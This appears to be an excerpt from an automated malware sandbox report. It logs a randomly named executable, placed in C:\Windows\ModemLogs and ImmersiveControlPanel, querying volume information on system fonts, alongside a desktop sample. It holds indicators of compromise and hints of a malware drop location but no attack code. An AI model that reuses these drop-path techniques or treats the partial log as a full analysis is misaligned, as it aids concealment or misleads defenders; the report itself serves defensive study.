Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe VolumeInformation
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Queries volume information: C:\Users\user\Desktop\QMT2731i8k.exe VolumeInformation
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe VolumeInformation
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Queries volume information: C:\Users\user\Desktop\QMT2731i8k.exe VolumeInformation
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe VolumeInformation
